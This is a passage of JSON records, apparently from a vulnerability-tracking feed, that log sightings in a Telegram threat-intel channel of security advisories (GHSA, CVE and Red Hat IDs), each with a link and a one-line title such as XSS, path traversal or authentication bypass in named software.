"d7e68a31-5d6d-4030-a73f-36fe4edf0f98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4GMJ-3P3H-GM8H", "type": "seen", "source": "https://t.me/ctinow/193763", "content": "https://ift.tt/nsTugtI\n[GHSA-4gmj-3p3h-gm8h] es5-ext vulnerable to Regular Expression Denial of Service in `function#copy` and `function#toStringTokens`", "creation_timestamp": "2024-02-26T21:17:22.000000Z"}, {"uuid": "530f2cc7-9f51-4212-b480-11552598a235", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HX5Q-V6PJ-533R", "type": "seen", "source": "https://t.me/ctinow/193762", "content": "https://ift.tt/Sykgtsm\n[GHSA-hx5q-v6pj-533r] SAML authentication bypass due to missing validation on unsigned SAML messages", "creation_timestamp": "2024-02-26T21:17:21.000000Z"}, {"uuid": "b0bc2c39-fbef-434d-811a-b9b96b204616", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4M6J-23P2-8C54", "type": "seen", "source": "https://t.me/ctinow/193761", "content": "https://ift.tt/6Ln9utC\n[GHSA-4m6j-23p2-8c54] Armeria SAML authentication bypass due to missing validation on unsigned SAML messages", "creation_timestamp": "2024-02-26T21:17:20.000000Z"}, {"uuid": "9f94ba97-fcea-412a-a5e4-55a31b1e54d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P4M5-32PR-2HQR", "type": "seen", "source": "https://t.me/ctinow/193760", "content": "https://ift.tt/UpHV6fO\n[GHSA-p4m5-32pr-2hqr] PyPop C extensions possible vulnerability: missing arguments and redundant null pointers", "creation_timestamp": "2024-02-26T21:17:19.000000Z"}, {"uuid": "ed7e660f-e1aa-4047-a90a-7ec517c99128", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9V3W-CJ7M-QH5G", "type": "seen", "source": "https://t.me/ctinow/182329", "content": "https://ift.tt/wvFdKxZ\n[GHSA-9v3w-cj7m-qh5g] Concrete CMS\u00a0vulnerable to reflected XSS via the Image URL Import Feature", "creation_timestamp": "2024-02-09T23:26:50.000000Z"}, {"uuid": "03a535be-eb97-41f8-9035-4e2f454e32d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MGP6-J658-VCW9", "type": "seen", "source": "https://t.me/ctinow/182328", "content": "https://ift.tt/B61farh\n[GHSA-mgp6-j658-vcw9] Concrete CMS vulnerable to stored XSS in file tags and description attributes", "creation_timestamp": "2024-02-09T23:26:49.000000Z"}, {"uuid": "510c029e-45ac-431a-bf97-f971f63f299c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q25H-JCH8-GFRP", "type": "seen", "source": "https://t.me/ctinow/182327", "content": "https://ift.tt/nAbytBW\n[GHSA-q25h-jch8-gfrp] Concrete CMS vulnerable to\u00a0stored XSS via the Role Name field", "creation_timestamp": "2024-02-09T23:26:48.000000Z"}, {"uuid": "dcb03c70-9cf5-40da-951c-1251c0f48d3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37VR-VMG4-JWPW", "type": "seen", "source": "https://t.me/ctinow/182311", "content": "https://ift.tt/7ZWIL0h\n[GHSA-37vr-vmg4-jwpw] Apache Solr: Backup/Restore APIs allow for deployment of executables in malicious ConfigSets", "creation_timestamp": "2024-02-09T23:06:57.000000Z"}, {"uuid": "52c9d020-e681-48e9-88d8-a111bc668501", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3HWC-RQWP-V36Q", "type": "seen", "source": "https://t.me/ctinow/182308", "content": "https://ift.tt/clg6y9k\n[GHSA-3hwc-rqwp-v36q] Apache Solr can leak certain passwords due to System Property redaction logic inconsistencies", "creation_timestamp": "2024-02-09T22:56:41.000000Z"}, {"uuid": "e7a16377-0bfc-4c0b-9384-9f2e7d0ce04d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-55XH-53M6-936R", "type": "seen", "source": "https://t.me/ctinow/185687", "content": "https://ift.tt/kqz9tM3\nCVE-2024-23680 | Amazon AWS Encryption SDK for Java up to 1.9.0/2.2.0 ECDSA Signature signature verification (GHSA-55xh-53m6-936r)", "creation_timestamp": "2024-02-15T16:52:04.000000Z"}, {"uuid": "a92bd08d-fec2-4609-a402-6d6bc5a80128", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V53G-5GJP-272R", "type": "seen", "source": "https://t.me/ctinow/185680", "content": "https://ift.tt/gFov5Cw\n[GHSA-v53g-5gjp-272r] Helm dependency management path traversal", "creation_timestamp": "2024-02-15T16:46:46.000000Z"}, {"uuid": "1621f8af-d4e4-429d-b4a5-7758c2aadaac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32H7-7J94-8FC2", "type": "seen", "source": "https://t.me/ctinow/182303", "content": "https://ift.tt/ER0F5rn\n[GHSA-32h7-7j94-8fc2] Mattermost vulnerable to denial of service via large number of emoji reactions", "creation_timestamp": "2024-02-09T22:46:48.000000Z"}, {"uuid": "bc37ac75-841b-4ca7-ae2f-f3924c51f785", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4WXW-42WX-2WFX", "type": "seen", "source": "https://t.me/ctinow/182297", "content": "https://ift.tt/Key4kgl\n[GHSA-4wxw-42wx-2wfx] Apache Solr Schema Designer blindly \"trusts\" all configsets", "creation_timestamp": "2024-02-09T22:26:54.000000Z"}, {"uuid": "dfd23122-77d2-4db9-8356-f790e43f4157", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3M6-GVM8-MHVW", "type": "seen", "source": "https://t.me/ctinow/186846", "content": "https://ift.tt/8zFqIWB\nCVE-2023-49783 | SilverStripe Admin up to 1.13.18/2.1.7 getCheckPermissions authorization (GHSA-j3m6-gvm8-mhvw)", "creation_timestamp": "2024-02-17T09:41:46.000000Z"}, {"uuid": "bc716df3-bc16-4ff7-9983-f711c0bd7f51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2PWH-52H7-7J84", "type": "seen", "source": "https://t.me/ctinow/185708", "content": "https://ift.tt/oNDtcj0\nCVE-2024-0758 | MolecularFaces prior 0.3.0 Molfiles cross site scripting (GHSA-2pwh-52h7-7j84)", "creation_timestamp": "2024-02-15T17:26:25.000000Z"}, {"uuid": "2a121b05-da03-4549-bb0f-0012b4ac122b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0861", "type": "seen", "source": "https://t.me/ctinow/187741", "content": "https://ift.tt/eBZ3pKc\nRHSA-2024:0861: Important: gimp:2.8 security update", "creation_timestamp": "2024-02-19T15:16:25.000000Z"}, {"uuid": "dd61f392-7981-4032-be3b-b2ae82d1b78c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0862", "type": "seen", "source": "https://t.me/ctinow/187740", "content": "https://ift.tt/ZegwO9p\nRHSA-2024:0862: Important: gimp:2.8 security update", "creation_timestamp": "2024-02-19T15:16:24.000000Z"}, {"uuid": "d9cd5757-7419-41d7-8a48-d286663c7ec1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6MF6-MXPC-JC37", "type": "seen", "source": "https://t.me/ctinow/187279", "content": "https://ift.tt/PHiojx2\nCVE-2023-52076 | mate-desktop atril up to 1.26.1 on Linux Document path traversal (GHSA-6mf6-mxpc-jc37)", "creation_timestamp": "2024-02-18T15:41:19.000000Z"}, {"uuid": "c005e943-666b-4b0f-ac12-c141c308fed8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-87P9-WPRH-7RM6", "type": "seen", "source": "https://t.me/ctinow/187318", "content": "https://ift.tt/GwZNkua\nCVE-2024-21630 | Zulip 8.0 authorization (GHSA-87p9-wprh-7rm6)", "creation_timestamp": "2024-02-18T18:11:18.000000Z"}, {"uuid": "080a7996-6aa4-401e-8eec-c7f3447a9542", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98HQ-4WMW-98W9", "type": "seen", "source": "https://t.me/ctinow/185831", "content": "https://ift.tt/4uLiwOB\nCVE-2024-23681 | Artemis Java Test Sandbox up to 1.11.1 sandbox (GHSA-98hq-4wmw-98w9)", "creation_timestamp": "2024-02-15T19:56:26.000000Z"}, {"uuid": "151f8921-f31c-438a-9953-72498a60180d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VF78-3Q9F-92G3", "type": "seen", "source": "https://t.me/ctinow/185830", "content": "https://ift.tt/2fDjhVQ\nCVE-2024-23687 | Folio mod-data-export-spring versions up to 1.5.3/2.0.1 API hard-coded credentials (GHSA-vf78-3q9f-92g3)", "creation_timestamp": "2024-02-15T19:56:25.000000Z"}, {"uuid": "bb7b4b91-0ce2-4da4-a3dc-69b74fbbee72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7947-48Q7-CP5M", "type": "seen", "source": "https://t.me/ctinow/187341", "content": "https://ift.tt/OHVSo36\nCVE-2024-23817 | Dolibarr = 18.0.4 cross site scripting (GHSA-7947-48q7-cp5m)", "creation_timestamp": "2024-02-18T19:16:25.000000Z"}, {"uuid": "d2b60b12-9f81-4471-adf2-4d724b18baf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5H47-G927-629G", "type": "seen", "source": "https://t.me/ctinow/187335", "content": "https://ift.tt/s1N2UAJ\nCVE-2024-23655 | tutao tutanota prior 3.119.10 Email denial of service (GHSA-5h47-g927-629g)", "creation_timestamp": "2024-02-18T18:46:58.000000Z"}, {"uuid": "913b1138-e716-4083-a934-8145899868b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQ23-G58M-799R", "type": "seen", "source": "https://t.me/ctinow/186992", "content": "https://ift.tt/1byDNPe\nCVE-2024-23633 | HumanSignal label-studio up to 1.10.0 Avatar Image data_import/uploader.py cross site scripting (GHSA-fq23-g58m-799r)", "creation_timestamp": "2024-02-17T17:46:19.000000Z"}, {"uuid": "909a4f71-3cd8-44b2-9dc0-43bb29b2a632", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PMGM-H3CC-M4HJ", "type": "seen", "source": "https://t.me/ctinow/186712", "content": "https://ift.tt/2MBYLO9\n[GHSA-pmgm-h3cc-m4hj] React Native Document Picker Directory Traversal vulnerability", "creation_timestamp": "2024-02-17T00:46:56.000000Z"}, {"uuid": "d6f8bb2e-3b21-4a36-9dbc-815fce91472f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77HH-43CM-V8J6", "type": "seen", "source": "https://t.me/ctinow/186711", "content": "https://ift.tt/jK8aW0n\n[GHSA-77hh-43cm-v8j6] tuf's Metadata API: Targets.get_delegated_role() is missing input validation", "creation_timestamp": "2024-02-17T00:46:55.000000Z"}, {"uuid": "9b2ae24d-f6cf-4493-821c-ccb70fa356a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FMG4-X8PW-HJHG", "type": "seen", "source": "https://t.me/ctinow/191063", "content": "https://ift.tt/c2RwNat\n[GHSA-fmg4-x8pw-hjhg] Fiber has Insecure CORS Configuration, Allowing Wildcard Origin with Credentials", "creation_timestamp": "2024-02-22T19:37:44.000000Z"}, {"uuid": "b0b38435-eb4e-4d44-8bb7-b6dc4a1a7442", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-97M3-52WR-XVV2", "type": "seen", "source": "https://t.me/ctinow/191044", "content": "https://ift.tt/LR6xjaJ\n[GHSA-97m3-52wr-xvv2] Dompdf's usage of vulnerable version of phenx/php-svg-lib leads to restriction bypass and potential RCE", "creation_timestamp": "2024-02-22T19:23:23.000000Z"}, {"uuid": "ec687837-2d2b-4246-8045-5c1f45816868", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0951", "type": "seen", "source": "https://t.me/ctinow/191004", "content": "https://ift.tt/oMzTgEn\nRHSA-2024:0951: Important: postgresql security update", "creation_timestamp": "2024-02-22T18:15:22.000000Z"}, {"uuid": "65115997-e952-4bbf-8002-5090e7d6602f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0952", "type": "seen", "source": "https://t.me/ctinow/191003", "content": "https://ift.tt/BxRwyIg\nRHSA-2024:0952: Important: firefox security update", "creation_timestamp": "2024-02-22T18:15:21.000000Z"}, {"uuid": "8dfb9c1f-df5f-4418-b603-e7253c379d45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0695", "type": "seen", "source": "https://t.me/ctinow/181048", "content": "https://ift.tt/chEqSNt\nRHSA-2024:0695: Moderate: Logging 5.6.16 - Red Hat OpenShift", "creation_timestamp": "2024-02-08T00:16:13.000000Z"}, {"uuid": "77437415-0b66-4f9c-8fde-bac4a2d1238d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0719", "type": "seen", "source": "https://t.me/ctinow/180787", "content": "https://ift.tt/Avwz12b\nRHSA-2024:0719: Moderate: Migration Toolkit for Runtimes security, bug fix and enhancement update", "creation_timestamp": "2024-02-07T16:16:51.000000Z"}, {"uuid": "c5f96e41-d770-44f1-86f7-a50add3796f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0720", "type": "seen", "source": "https://t.me/ctinow/180786", "content": "https://ift.tt/eC4dgYV\nRHSA-2024:0720: Moderate: Migration Toolkit for Runtimes security, bug fix and enhancement update", "creation_timestamp": "2024-02-07T16:16:50.000000Z"}, {"uuid": "44474769-3af8-4257-b8aa-9dc9180019dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3535-M8VH-VRMW", "type": "seen", "source": "https://t.me/ctinow/180227", "content": "https://ift.tt/YofGV8h\nCVE-2024-22408 | Shopware up to 6.5.7.3 Flow Builder server-side request forgery (GHSA-3535-m8vh-vrmw)", "creation_timestamp": "2024-02-06T18:41:40.000000Z"}, {"uuid": "9dce1fab-1ece-48d4-bf77-7e2b7a7fc067", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QMP9-2XWJ-M6M9", "type": "seen", "source": "https://t.me/ctinow/180226", "content": "https://ift.tt/iECIlwq\nCVE-2024-22406 | Shopware up to 6.5.7.3 API sql injection (GHSA-qmp9-2xwj-m6m9)", "creation_timestamp": "2024-02-06T18:41:39.000000Z"}, {"uuid": "e9f6ee60-2955-4491-b888-8448f5ab529f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC6X-CW6P-GJ7H", "type": "seen", "source": "https://t.me/ctinow/179867", "content": "https://ift.tt/6VWtNYZ\nCVE-2023-45232 | TianoCore EDK2 stable202308 IPv6 Options Header infinite loop (GHSA-hc6x-cw6p-gj7h)", "creation_timestamp": "2024-02-06T10:11:13.000000Z"}, {"uuid": "c17f4f4d-e5e7-4f73-8cf0-0a176969675e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GFRH-GWQC-63CV", "type": "seen", "source": "https://t.me/ctinow/179522", "content": "https://ift.tt/8poYOsT\n[GHSA-gfrh-gwqc-63cv] Sulu HTML Injection via Autocomplete Suggestion", "creation_timestamp": "2024-02-05T21:36:50.000000Z"}, {"uuid": "fa3b9917-219f-4b99-a3b0-985e8ebab5e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6648-6G96-MG35", "type": "seen", "source": "https://t.me/ctinow/179521", "content": "https://ift.tt/geXZ4JM\n[GHSA-6648-6g96-mg35] phpMyFAQ User Removal Page Allows Spoofing Of User Details", "creation_timestamp": "2024-02-05T21:36:49.000000Z"}, {"uuid": "11feb276-6af6-49d8-9b1e-a773022ca6d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9HHF-XMCW-R3XG", "type": "seen", "source": "https://t.me/ctinow/179520", "content": "https://ift.tt/GrXvSqM\n[GHSA-9hhf-xmcw-r3xg] phpMyFAQ sharing FAQ functionality can easily be abused for phishing purposes", "creation_timestamp": "2024-02-05T21:36:47.000000Z"}, {"uuid": "7334cafc-36ef-465e-b30c-c7e9ed147888", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2C2-Q32W-4W6M", "type": "seen", "source": "https://t.me/ctinow/190565", "content": "https://ift.tt/QIcEYiU\nCVE-2024-24567 | Vyper raw_call value unusual condition (GHSA-x2c2-q32w-4w6m)", "creation_timestamp": "2024-02-22T09:37:00.000000Z"}, {"uuid": "335715bc-82fd-4096-8e70-1c34fee0da43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WF85-8HX9-GJ7C", "type": "seen", "source": "https://t.me/ctinow/184015", "content": "https://ift.tt/wG2eSYl\n[GHSA-wf85-8hx9-gj7c] TYPO3 vulnerable to Improper Access Control of Resources Referenced by t3:// URI Scheme", "creation_timestamp": "2024-02-13T18:31:47.000000Z"}, {"uuid": "ac03713f-98e8-4d54-bc92-34ce0d1c5122", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2JV5-9R88-3W3P", "type": "seen", "source": "https://t.me/ctinow/183325", "content": "https://ift.tt/HCOLynd\n[GHSA-2jv5-9r88-3w3p] python-multipart vulnerable to Content-Type Header ReDoS", "creation_timestamp": "2024-02-12T18:36:47.000000Z"}, {"uuid": "8e3c24f6-d9c7-4e96-981f-235217cce336", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0937", "type": "seen", "source": "https://t.me/ctinow/190385", "content": "https://ift.tt/JhBlF7P\nRHSA-2024:0937: Important: kpatch-patch security update", "creation_timestamp": "2024-02-22T04:16:21.000000Z"}, {"uuid": "c288301a-66e8-43ce-b0f7-4b4f64554876", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HPXR-W9W7-G4GV", "type": "seen", "source": "https://t.me/ctinow/190862", "content": "https://ift.tt/hFYpgam\nCVE-2024-24579 | anchore stereoscope prior 0.0.1 UntarToDirectory path traversal (GHSA-hpxr-w9w7-g4gv)", "creation_timestamp": "2024-02-22T16:11:31.000000Z"}, {"uuid": "8d6537af-dc22-4c45-844a-5123a3dc80bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7M8G-FPRR-47FX", "type": "seen", "source": "https://t.me/ctinow/179519", "content": "https://ift.tt/RVB3tnd\n[GHSA-7m8g-fprr-47fx] phpMyFAQ vulnerable to stored XSS on attachments filename", "creation_timestamp": "2024-02-05T21:36:46.000000Z"}, {"uuid": "94edfe64-0f74-4ccb-84af-1341b6ad8bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MPWJ-FCR6-X34C", "type": "seen", "source": "https://t.me/ctinow/179518", "content": "https://ift.tt/IMywnP2\n[GHSA-mpwj-fcr6-x34c] Yarn untrusted search path vulnerability", "creation_timestamp": "2024-02-05T21:36:45.000000Z"}, {"uuid": "1bf9a5f8-6605-4e29-bdbb-11ae85282973", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XC9X-JJ77-9P9J", "type": "seen", "source": "https://t.me/ctinow/179517", "content": "https://ift.tt/WP3wUg1\n[GHSA-xc9x-jj77-9p9j] Nokogiri update packaged libxml2 to v2.12.5 to resolve CVE-2024-25062", "creation_timestamp": "2024-02-05T21:36:44.000000Z"}, {"uuid": "c0414bbb-bbd4-42d3-854d-f1b592989e2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5626-PW9C-HMJR", "type": "seen", "source": "https://t.me/ctinow/190922", "content": "https://ift.tt/mhbYX0k\nCVE-2024-23637 | OctoPrint up to 1.9.3 unverified password change (GHSA-5626-pw9c-hmjr)", "creation_timestamp": "2024-02-22T16:51:26.000000Z"}, {"uuid": "c26ee27e-ce87-48bf-80c3-f91c0e62f62e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RV8P-RR2H-FGPG", "type": "seen", "source": "https://t.me/ctinow/190561", "content": "https://ift.tt/3R4XbaP\nCVE-2024-23841 | apollographql apollo-client-nextjs 0.7.0 Link cross site scripting (GHSA-rv8p-rr2h-fgpg)", "creation_timestamp": "2024-02-22T09:36:56.000000Z"}, {"uuid": "01f406d7-68e7-4101-8622-3e318592eaab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QHJF-HM5J-335W", "type": "seen", "source": "https://t.me/ctinow/190548", "content": "https://ift.tt/lEFAWTy\nCVE-2024-24556 | urql-graphql urql up to 1.1.0 cross site scripting (GHSA-qhjf-hm5j-335w)", "creation_timestamp": "2024-02-22T09:07:39.000000Z"}, {"uuid": "3aac2a43-0554-4f06-81b2-fcabc120fe01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0950", "type": "seen", "source": "https://t.me/ctinow/190943", "content": "https://ift.tt/Xb5hzZq\nRHSA-2024:0950: Important: postgresql:15 security update", "creation_timestamp": "2024-02-22T17:13:03.000000Z"}, {"uuid": "1669b34a-af74-4740-965f-72196c72ef5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0733", "type": "seen", "source": "https://t.me/ctinow/180995", "content": "https://ift.tt/9Lq7kNU\nRHSA-2024:0733: Moderate: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update", "creation_timestamp": "2024-02-07T22:16:33.000000Z"}, {"uuid": "80e04500-f609-4530-9ec6-3d82b45089ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6726-2RX3-CGWH", "type": "seen", "source": "https://t.me/ctinow/180946", "content": "https://ift.tt/PQ4y5WK\n[GHSA-6726-2rx3-cgwh] Apache Ozone Improper Authentication vulnerability", "creation_timestamp": "2024-02-07T20:36:52.000000Z"}, {"uuid": "148d3d4f-a220-41a2-93b2-4afb34e0e845", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0694", "type": "seen", "source": "https://t.me/ctinow/180940", "content": "https://ift.tt/nvERAoB\nRHSA-2024:0694: Moderate: Logging Subsystem 5.7.11 - Red Hat OpenShift", "creation_timestamp": "2024-02-07T20:16:24.000000Z"}, {"uuid": "0162c606-7006-446d-8bd5-afc4e80defc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-475G-VJ6C-XF96", "type": "seen", "source": "https://t.me/ctinow/190546", "content": "https://ift.tt/vj0qXLz\nCVE-2024-24565 | CrateDB 5.3.9/5.4.8/5.5.4/5.6.1 COPY FROM path traversal (GHSA-475g-vj6c-xf96)", "creation_timestamp": "2024-02-22T09:07:37.000000Z"}, {"uuid": "e8546824-a398-48a7-97d9-c1f57cdc0344", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G8VP-2V5P-9QFH", "type": "seen", "source": "https://t.me/ctinow/180171", "content": "https://ift.tt/QYUL1Jt\nCVE-2024-22411 | avo up to 2.x on Ruby Notifications Avo::BaseAction cross site scripting (GHSA-g8vp-2v5p-9qfh)", "creation_timestamp": "2024-02-06T17:41:57.000000Z"}, {"uuid": "500163ea-8a04-44d2-928f-cbfd3fb5d8b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9GP8-6CG8-7H34", "type": "seen", "source": "https://t.me/ctinow/180131", "content": "https://ift.tt/wnX1ElZ\n[GHSA-9gp8-6cg8-7h34] Spring Security's spring-security.xsd file is world writable", "creation_timestamp": "2024-02-06T17:06:59.000000Z"}, {"uuid": "0d51d8bd-7e8a-45d5-932e-aedb0da577ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-997G-27X8-43RF", "type": "seen", "source": "https://t.me/ctinow/190581", "content": "https://ift.tt/cTkWz7D\nCVE-2024-24558 | TanStack Query prior 5.18.0 cross site scripting (GHSA-997g-27x8-43rf)", "creation_timestamp": "2024-02-22T10:06:40.000000Z"}, {"uuid": "5d79fad7-e1c7-40ed-b007-8e9af9359b79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0716", "type": "seen", "source": "https://t.me/ctinow/180739", "content": "https://ift.tt/7ZQYdyC\nRHSA-2024:0716: Important: gimp security update", "creation_timestamp": "2024-02-07T15:17:05.000000Z"}, {"uuid": "b56964f6-6fc5-4f0e-b139-81182fe57dc7", 